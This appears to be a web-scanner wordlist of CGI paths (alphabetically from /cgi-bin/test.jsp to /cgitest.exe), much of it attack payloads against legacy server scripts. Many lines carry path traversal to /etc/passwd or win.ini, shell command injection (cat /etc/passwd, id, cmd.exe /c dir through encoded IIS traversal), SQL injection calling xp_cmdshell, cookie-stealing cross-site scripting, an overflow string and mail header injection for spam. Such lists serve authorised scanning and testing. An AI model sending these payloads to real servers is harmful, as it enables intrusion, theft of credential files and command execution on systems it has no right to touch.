/cgi-bin/test.jsp
/cgi-bin/test.php
/cgi-bin/test.php3
/cgi-bin/test.pl
/cgi-bin/test.pl%3F+.htr
/cgi-bin/test.shtml
/cgi-bin/test.txt
/cgi-bin/test.txt?<script>alert(document.cookie)</script>
/cgi-bin/test/test.cgi
/cgi-bin/Test11.asp
/cgi-bin/test2.pl?&lt
/cgi-bin/test2.pl?<script>alert('Vulnerable');</script>
/cgi-bin/testcgi
/cgi-bin/testcgi.exe
/cgi-bin/testcgi.exe?<script>alert(document.cookie);</script>
/cgi-bin/testin
/cgi-bin/testing.asp
/cgi-bin/testing.cgi
/cgi-bin/testing.htm
/cgi-bin/testing.html
/cgi-bin/testing.txt
/cgi-bin/testing_whatever
/cgi-bin/testit.pl
/cgi-bin/texis.exe/junk
/cgi-bin/texis.exe/phine
/cgi-bin/texis/junk
/cgi-bin/textcounter
/cgi-bin/textcounter.cgi
/cgi-bin/textcounter.pl
/cgi-bin/tidfinder.cgi
/cgi-bin/tigvote.cgi
/cgi-bin/tigvote.pl
/cgi-bin/title.cgi
/cgi-bin/tmp
/cgi-bin/ToDo
/cgi-bin/TODO.txt
/cgi-bin/tools/
/cgi-bin/tools/ct.htx
/cgi-bin/tools/ct.idc
/cgi-bin/tools/ctss.htx
/cgi-bin/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=ngt(ng%20int);EXEC+master..xp_cmdshell("cmd.exe+/c%20dir");--
/cgi-bin/tools/details.idc
/cgi-bin/tools/dnsform.exe
/cgi-bin/tools/dsn.exe
/cgi-bin/tools/dsnform.exe
/cgi-bin/tools/getdrvrs.exe
/cgi-bin/tools/getdrvs.exe
/cgi-bin/tools/log.exe
/cgi-bin/tools/logs.exe
/cgi-bin/tools/mkilog.exe
/cgi-bin/tools/mkplog.exe
/cgi-bin/tools/newdns.exe
/cgi-bin/tools/newdsn.exe
/cgi-bin/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Web%20SQL&dbq=c:\web.mdb&newdb=CREATE_DB&attr=
/cgi-bin/top/admin.cgi
/cgi-bin/tpgnrock
/cgi-bin/Trace.axd
/cgi-bin/traceroute.cgi?host=|id|
/cgi-bin/traceroute.pl?host=|set
/cgi-bin/tradecli.dll
/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
/cgi-bin/troops.cgi
/cgi-bin/tst.bat
/cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
/cgi-bin/ttaarchives.cgi
/cgi-bin/ttawebtop.cgi
/cgi-bin/ttawebtop.cgi/
/cgi-bin/ttawebtop.cgi/?action
/cgi-bin/ttawebtop.cgi/?action=
/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
/cgi-bin/ttt-out?link=testing%20<script>alert(document.cookie)</script>
/cgi-bin/ubb/ubb-library.cgi
/cgi-bin/udirectory.pl?MAIN_FIELD=blah&command=add_new_listing&category_file=/../../../../../../../bin/ping
/cgi-bin/ultimate.cgi
/cgi-bin/ultraboard.cgi
/cgi-bin/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
/cgi-bin/ultraboard.pl
/cgi-bin/UltraBoard/UltraBoard.pl?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
/cgi-bin/uname
/cgi-bin/uname-cgi
/cgi-bin/uname.cgi
/cgi-bin/unamecgi
/cgi-bin/uncgi
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/update.dpgs
/cgi-bin/update.htm
/cgi-bin/update.html
/cgi-bin/upgrade.txt
/cgi-bin/upload-cgi
/cgi-bin/upload.asp
/cgi-bin/upload.cgi
/cgi-bin/upload.pl
/cgi-bin/uploadcgi
/cgi-bin/uploader.exe
/cgi-bin/UploadExt.dll
/cgi-bin/uploadn.asp
/cgi-bin/UploadScript11.asp
/cgi-bin/uploadx.asp
/cgi-bin/upload_file.pl
/cgi-bin/uptime
/cgi-bin/uptime.cgi
/cgi-bin/uptime.pl
/cgi-bin/urlcount.cgi
/cgi-bin/usage.asp
/cgi-bin/usage.cgi
/cgi-bin/usage.htm
/cgi-bin/usage.html
/cgi-bin/usage.php
/cgi-bin/usage/
/cgi-bin/usage_200809.htm
/cgi-bin/usage_200809.html
/cgi-bin/usage_200810.htm
/cgi-bin/usage_200810.html
/cgi-bin/user.asp
/cgi-bin/user.cfg
/cgi-bin/user.cgi
/cgi-bin/user.dat
/cgi-bin/user.data
/cgi-bin/user.db
/cgi-bin/user.dbf
/cgi-bin/user.exe
/cgi-bin/user.htm
/cgi-bin/user.html
/cgi-bin/user.htx
/cgi-bin/user.ini
/cgi-bin/user.lst
/cgi-bin/user.pl
/cgi-bin/user.txt
/cgi-bin/usercp.php?s="><script>alert('XSS')</script>
/cgi-bin/UserPrefs.CGI
/cgi-bin/userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0als
/cgi-bin/users.asp
/cgi-bin/users.cfg
/cgi-bin/users.cgi
/cgi-bin/users.dat
/cgi-bin/users.data
/cgi-bin/users.db
/cgi-bin/users.dbf
/cgi-bin/users.exe
/cgi-bin/users.htm
/cgi-bin/users.html
/cgi-bin/users.htx
/cgi-bin/users.ini
/cgi-bin/users.lst
/cgi-bin/users.pl
/cgi-bin/users.txt
/cgi-bin/users/admins.htx
/cgi-bin/users/clients.htx
/cgi-bin/users/pass.htx
/cgi-bin/users/password.htx
/cgi-bin/users/passwords.htx
/cgi-bin/user_adm.html
/cgi-bin/user_info.php3?user_username=''+or+admin_level=2+or+username%3d'x'+and+users.id=access.user_id;%00
/cgi-bin/ustorekeeper.pl
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/cgi-bin/utils.inc
/cgi-bin/validate.inc
/cgi-bin/variable.cgi
/cgi-bin/view-source
/cgi-bin/view-source?../../../../../../../../etc/passwd
/cgi-bin/view-source?view-source
/cgi-bin/view.sh
/cgi-bin/viewcode.asp?file=index.asp
/cgi-bin/viewcvs.cgi
/cgi-bin/viewcvs.cgi/?sortby=rev"><script>alert('XSS')</script>
/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=
/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert("vulnerable")</script>
/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("vulnerable")</script>
/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
/cgi-bin/viewlogs.pl
/cgi-bin/viewsource?/etc/passwd
/cgi-bin/viewsrc.cgi
/cgi-bin/viewsrc.cgi?loc=../../../../../../../../etc/hosts
/cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
/cgi-bin/view_page.html
/cgi-bin/viralator.cgi
/cgi-bin/virgil.cgi
/cgi-bin/virgil/virgil.cgi?tar=-lp&zielport=31337
/cgi-bin/visadmin.exe
/cgi-bin/visadmin.exe?user=guest
/cgi-bin/visitor.exe
/cgi-bin/visitor.exe 
/cgi-bin/vote.cgi
/cgi-bin/vpasswd.cgi
/cgi-bin/vq/demos/respond.pl?
/cgi-bin/VsSetCookie.exe
/cgi-bin/VsSetCookie.exe?
/cgi-bin/w2-msql
/cgi-bin/w2-msql/protected-dir/.htpasswd
/cgi-bin/w3-msql
/cgi-bin/w3-msql/
/cgi-bin/w3-msql/.htpasswd
/cgi-bin/w3-msql/index.html
/cgi-bin/w3-sql
/cgi-bin/w3-sql/index.html
/cgi-bin/w3-sql/protected-dir/.htpasswd
/cgi-bin/w3mail/sendmessage.cgi
/cgi-bin/w3tvars.pm
/cgi-bin/wais.pl
/cgi-bin/way-board.cgi?db=/etc/passwd%00
/cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
/cgi-bin/wconsole.dll
/cgi-bin/wdir.txt
/cgi-bin/wdirs.txt
/cgi-bin/we3.3.3/webevent.pl
/cgi-bin/webais
/cgi-bin/WebAPP/index.cgi?action=topics&viewcat=../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/webapp/mods/ecart/index.cgi?action=viewart&cat=&art=|id|
/cgi-bin/webauthor.htm
/cgi-bin/webbbs.cgi
/cgi-bin/webbbs.exe
/cgi-bin/webbbs/webbbs_config.pl
/cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
/cgi-bin/webboard/generate.cgi?content=../../../../../../../../../etc/passwd%00&board=boardsname
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id|&CODE=PHOLD
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;ls|&CODE=PHOLD
/cgi-bin/webdata.cgi
/cgi-bin/webdata_test.pl
/cgi-bin/webdist.cgi
/cgi-bin/webdist.cgi?distloc=;/bin/sh%20-c%20set
/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd 
/cgi-bin/webdist.cgi?distloc=;ls%20-lFa%20/etc/
/cgi-bin/webdriver
/cgi-bin/webfind.exe?keywords=01234567890123456789
/cgi-bin/webgais
/cgi-bin/webhints/hints.cgi
/cgi-bin/webhints/hints.pl
/cgi-bin/webif.cgi
/cgi-bin/weblog
/cgi-bin/webmail.cgi?subject=;id;&send_to=&response_url=/
/cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/webmap
/cgi-bin/webmap.cgi
/cgi-bin/webmap.pl
/cgi-bin/Webnews.exe
/cgi-bin/webnews.pl
/cgi-bin/webplus
/cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml
/cgi-bin/webplus.exe
/cgi-bin/webplus.exe?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/cgi-bin/webplus.exe?about
/cgi-bin/webplus.exe?script=%2Fwebpshop%2Fstore.wml&storeid=%27
/cgi-bin/webplus.exe?script=../../../../../../../../../../etc/passwd
/cgi-bin/webplus?about
/cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
/cgi-bin/websendmail
/cgi-bin/websendmail.cgi
/cgi-bin/webshell
/cgi-bin/webspirs.bat
/cgi-bin/webspirs.cgi
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd
/cgi-bin/webspirs.cmd
/cgi-bin/webstats.asp
/cgi-bin/webstats.cgi
/cgi-bin/webstats.html
/cgi-bin/webstats.php
/cgi-bin/WebStore/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
/cgi-bin/websync.exe
/cgi-bin/webutil.pl
/cgi-bin/webutil.pl?|%20cat%20/etc/passwd
/cgi-bin/webutils.pl
/cgi-bin/webutils.pl?|%20cat%20/etc/passwd
/cgi-bin/webwho.pl
/cgi-bin/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
/cgi-bin/web_store.cgi?page=.html|cat%20/etc/passwd|
/cgi-bin/web_store.cgi?page=.html|id|
/cgi-bin/Web_Store/web_store.cgi
/cgi-bin/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
/cgi-bin/wguest.exe
/cgi-bin/whois.cgi
/cgi-bin/whois.cgi?action=load&whois=%3Bid
/cgi-bin/whois.cgi?host=|id|
/cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
/cgi-bin/whois.pl
/cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
/cgi-bin/whois_raw.cgi
/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
/cgi-bin/win2win.cgi
/cgi-bin/wincgi.bat
/cgi-bin/windmail
/cgi-bin/windmail.exe
/cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
/cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\
/cgi-bin/winmsdp.exe
/cgi-bin/wja?page=wja
/cgi-bin/wops.cgi?path=<script>alert('CSS')</script>
/cgi-bin/WorldClient.cgi
/cgi-bin/wrap
/cgi-bin/wrap.cgi
/cgi-bin/wrap.pl
/cgi-bin/wrap/blah;/tmp/myscript
/cgi-bin/WS/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
/cgi-bin/wsendmail.exe
/cgi-bin/wsisa.dll/extra/
/cgi-bin/wsisa.dll/WService=anything?WSMadmin
/cgi-bin/ws_ftp.ini
/cgi-bin/WS_FTP.LOG
/cgi-bin/www-sql
/cgi-bin/www-sql 
/cgi-bin/www-sql/
/cgi-bin/wwwadmin.pl
/cgi-bin/wwwboard.cgi
/cgi-bin/wwwboard.cgi.cgi
/cgi-bin/wwwboard.pl
/cgi-bin/wwwboard.pl 
/cgi-bin/wwwboard/wwwadmin.cgi
/cgi-bin/wwwboard/wwwboard.cgi
/cgi-bin/wwwboard/wwwboard.pl
/cgi-bin/wwwshell.pl
/cgi-bin/wwwstat.asp
/cgi-bin/wwwstat.php3
/cgi-bin/wwwstats.asp
/cgi-bin/wwwstats.cgi
/cgi-bin/wwwstats.htm
/cgi-bin/wwwstats.html
/cgi-bin/wwwstats.php
/cgi-bin/wwwstats.pl
/cgi-bin/wwwstats.txt
/cgi-bin/wwwstats/
/cgi-bin/wwwthreads/3tvars.pm
/cgi-bin/wwwthreads/w3tvars.pm
/cgi-bin/wwwuploader.exe
/cgi-bin/wwwwais
/cgi-bin/www_acl
/cgi-bin/www_stats/
/cgi-bin/xferlog.txt
/cgi-bin/Xrun.cgi
/cgi-bin/YaBB.pl
/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
/cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=
/cgi-bin/YABB/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
/cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
/cgi-bin/zml.cgi?file=../../../../../../../../../etc/motd%00
/cgi-bin/zml.cgi?file=../../../../../../../../../etc/passwd%00
/cgi-bin/zsh
/cgi-bin/_root_.sys
/cgi-bin/_vti_cnf 
/cgi-bin/_vti_cnf/
/cgi-bin/~auth.cgi
/cgi-bin2/
/cgi-bin2/.passwd
/cgi-bin2/ampro/info
/cgi-bin2/info/.htpasswd
/cgi-bin2/MsmMask.exe
/cgi-bin2/MsmMask.exe?mask=/
/cgi-bin2/pm/password_manager
/cgi-bin2/pm/password_manager/backup_files
/cgi-bin2/rmp/password_manager/backup_files
/cgi-bin\test.cgi
/cgi-bin\\test.cgi
/cgi-bin\\\test.cgi
/cgi-bin_
/cgi-bin~
/cgi-bin~1
/cgi-bin~bk
/cgi-bi~1.lnk
/cgi-csc/
/cgi-db2/
/cgi-dos
/cgi-dos/
/cgi-dos/args.bat
/cgi-dos/args.bat|args.bat
/cgi-dos/args.cmd
/cgi-dos/foo.cmd?xxx&dir
/cgi-dos/patch.exe
/cgi-dos/perl.exe
/cgi-dos/uploads/patch.exe
/cgi-forte/
/cgi-forte/dump.out
/cgi-forte/fortecgi.dat
/cgi-forte/fortecgi.out
/cgi-forte/fortecgi?servicename=internalmonitor&pagename=pingcgi
/cgi-forte/webipmsg.txt
/cgi-home/
/cgi-lib.pl
/cgi-lib/
/cgi-local/
/cgi-local/admin/classes/minixml/classes/doc.inc.php
/cgi-local/admin/classes/minixml/classes/element.inc.php
/cgi-local/admin/classes/minixml/classes/node.inc.php
/cgi-local/auktion/item.pl/item.pl?item=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/cgi-local/auktion/itemlist.pl?category=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/cgi-local/cgiemail-1.4/cgicso?query=
/cgi-local/cgiemail-1.4/cgicso?query=AAA
/cgi-local/cgiemail-1.6/cgicso?query=
/cgi-local/cgiemail-1.6/cgicso?query=AAA
/cgi-local/mailfile.cgi
/cgi-lwgate/lwgate
/cgi-lwgate/lwgate.cgi
/cgi-lwgate/lwgate.pl
/cgi-script/
/cgi-scripts/
/cgi-sdb
/cgi-shl/
/cgi-shl/win-c-sample.exe
/cgi-shop/
/cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
/cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
/cgi-shop/view_item?HTML_FILE=../../../../../../etc/passwd%00&KEY=12345-67890
/cgi-shop/view_item?HTML_FILE=../../../../../../etc/passwd%00&KEY=1900-0999
/cgi-source/
/cgi-src/
/cgi-src/CppSample
/cgi-sys
/cgi-sys/
/cgi-sys/addalink.cgi
/cgi-sys/cgiecho
/cgi-sys/cgiemail
/cgi-sys/countedit
/cgi-sys/domainredirect.cgi
/cgi-sys/entropybanner.cgi
/cgi-sys/entropysearch.cgi
/cgi-sys/filemail.pl
/cgi-sys/FormMail-clone.cgi
/cgi-sys/helpdesk.cgi
/cgi-sys/mchat.cgi
/cgi-sys/randhtml.cgi
/cgi-sys/realhelpdesk.cgi
/cgi-sys/realsignup.cgi
/cgi-sys/scgiwrap
/cgi-sys/signup.cgi
/cgi-temp/
/cgi-test.exe
/cgi-weddico/
/cgi-win/
/cgi-win/admin/classes/minixml/classes/doc.inc.php
/cgi-win/admin/classes/minixml/classes/element.inc.php
/cgi-win/admin/classes/minixml/classes/node.inc.php
/cgi-win/cgitest.exe
/cgi-win/cgitest32.exe/CGI
/cgi-win/mailfile.cgi
/cgi-win/test-win.exe
/cgi-win/uploader.exe
/cgi-win/wincgi.bat 
/cgi-win/wwwuploader.exe
/cgi/
/cgi/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/cgi/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/cgi/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/cgi/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/cgi/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
/cgi/..%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/system32/cmd.exe?/c+dir
/cgi/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/cgi/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/cgi/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/cgi/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/cgi/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/cgi/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/cgi/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/cgi/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/cgi/.cobalt/siteUserMod/siteUserMod.cgi
/cgi/ad.cgi
/cgi/adcycle
/cgi/admin/admin
/cgi/admin/classes/minixml/classes/doc.inc.php
/cgi/admin/classes/minixml/classes/element.inc.php
/cgi/admin/classes/minixml/classes/node.inc.php
/cgi/aglimpse
/cgi/allmanage.pl
/cgi/allmanageup.pl
/cgi/amlite/amadmin.pl
/cgi/anacondaclip.pl?template=check
/cgi/AnyForm2
/cgi/AT-admin.cgi
/cgi/AT-generate.cgi
/cgi/auktion.pl
/cgi/awl/auctionweaver.pl
/cgi/bb-hist.sh
/cgi/bbs_forum.cgi
/cgi/bizdb1-search.cgi
/cgi/bnbform.cgi
/cgi/Board/db/
/cgi/build.cgi
/cgi/cached_feed.cgi
/cgi/cachemgr.cgi
/cgi/calender.pl
/cgi/calender_admin.pl
/cgi/cal_make.pl
/cgi/campas
/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
/cgi/cgiforum.pl
/cgi/cgiproc?
/cgi/cgiwrap
/cgi/changepw.cgi
/cgi/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
/cgi/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
/cgi/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
/cgi/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
/cgi/classifieds.cgi
/cgi/commerce.cgi
/cgi/commerce.cgi?page=check
/cgi/Count.cgi
/cgi/counterfiglet/nc/f
/cgi/CrazyWWWBoard.cgi
/cgi/cvsweb/cvsweb.cgi
/cgi/day5datacopier.cgi
/cgi/day5datanotifier.cgi
/cgi/db2www/library/document.d2w/show
/cgi/dcadmin.cgi
/cgi/dcboard.cgi
/cgi/dcforumlib.pl
/cgi/dmailweb.cgi
/cgi/dnewsweb.cgi
/cgi/dumpenv.pl
/cgi/edit.pl
/cgi/empower?DB=UkRteamHole
/cgi/environ.cgi
/cgi/everythingform.cgi
/cgi/ezshopper2/loadpage.cgi
/cgi/ezshopper3/loadpage.cgi
/cgi/faxsurvey
/cgi/filemail.pl
/cgi/files.pl
/cgi/finger
/cgi/formmail.cgi
/cgi/gbook/gbook.cgi?_MAILTO=check;id
/cgi/getdoc.cgi
/cgi/glimpse
/cgi/global.cgi
/cgi/guestbook.cgi
/cgi/guestbook.pl
/cgi/handler
/cgi/hints.cgi
/cgi/hints.pl
/cgi/hsx.cgi
/cgi/htgrep
/cgi/htmlscript
/cgi/htsearch
/cgi/htsearch?config=aaa
/cgi/ikonboard/help.cgi
/cgi/info2www
/cgi/infosrch.cgi
/cgi/ipf/etc/gfw/ui/pwd.dat
/cgi/jj
/cgi/lasso.cgi
/cgi/loadpage.cgi
/cgi/mailfile.cgi
/cgi/mailform.pl
/cgi/maillist.pl
/cgi/mailnews.cgi
/cgi/mailto.cgi
/cgi/man.sh
/cgi/mdma.bat
/cgi/mmstdod.cgi?ALTERNATE_TEMPLATES=
/cgi/netauth.cgi
/cgi/news/news.cgi
/cgi/newsdesk.cgi?t=../pass.txt
/cgi/nph-maillist.pl
/cgi/nph-publish
/cgi/nph-test-cgi
/cgi/pagelog.cgi
/cgi/pals-cgi
/cgi/perl
/cgi/perl.exe
/cgi/perlshop.cgi
/cgi/pfdisplay.cgi
/cgi/phf
/cgi/phf.cgi
/cgi/php
/cgi/php.cgi
/cgi/plusmail
/cgi/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00
/cgi/post-query
/cgi/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&TopicSubject=&replyto=0
/cgi/processit.pl
/cgi/query
/cgi/redirect.cgi
/cgi/register.cgi
/cgi/replicator/webpage.cgi
/cgi/responder.cgi
/cgi/rpm_query
/cgi/rwwwshell.pl
/cgi/s.cgi?q=a&tmpl=check
/cgi/scripts/whois.cgi?action=load&whois=check
/cgi/search.cgi?letter=
/cgi/Search.pl
/cgi/search/tidfinder.cgi?2956734
/cgi/simplestguest.cgi
/cgi/simplestmail.cgi
/cgi/ssi
/cgi/store.cgi?StartID=../etc/hosts%00.html
/cgi/subscribe.pl
/cgi/survey.cgi
/cgi/test-cgi
/cgi/textcounter.pl
/cgi/ultraboard.cgi
/cgi/unlg1.1
/cgi/unlg1.2
/cgi/upload_file.pl
/cgi/ustorekeeper.pl
/cgi/view-source
/cgi/view_page.html
/cgi/w3-msql
/cgi/wais.pl
/cgi/webdata.cgi
/cgi/webdist.cgi
/cgi/webdriver
/cgi/webgais
/cgi/webplus.cgi?Script=/webplus/webping/webping.wml
/cgi/websendmail
/cgi/webspirs.cgi
/cgi/webwho.pl
/cgi/whois?whois_nic=<script>alert('CSS')</script>&type=domain
/cgi/whois_raw.cgi
/cgi/wja
/cgi/wrap
/cgi/wrap.cgi
/cgi/www-sql
/cgi/wwwboard.pl
/cgi/Xrun.cgi
/cgi/YaBB.pl
/cgiback.cgi
/cgibin/
/cgibin/admin/classes/minixml/classes/doc.inc.php
/cgibin/admin/classes/minixml/classes/element.inc.php
/cgibin/admin/classes/minixml/classes/node.inc.php
/cgibin/mailfile.cgi
/cgicso
/cgicso?query=<script>alert('vulnerable')</script>
/cgicso?query=AAA
/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>
/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>
/cgiemail/uargg.txt?0=0&1=1&2=2&256=256&array=array&a=a&i=i&c=c&arr=arr
/cgiemail?required-webmaster=xxx@xxx.com&required-from=zzz@zzz.com&required-subject=spam%0aCC:address1@smap.com%20address2@smap.com%20address3@smap.com&comments=spam%20message
/cgiforum.cgi
/cgiforum.cgi?thesection=../../../../../../etc/hosts%00
/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
/cgilib/
/cgilocal/
/CGImail.exe
/CGImail.exe?%24Attach%24=file.txt&%24To%24=test@test.com
/cgiproc?
/cgis/
/cgis/wwwboard/wwwboard.cgi
/cgis/wwwboard/wwwboard.pl
/cgiscripts/
/cgishl
/cgishl/
/cgitest.exe
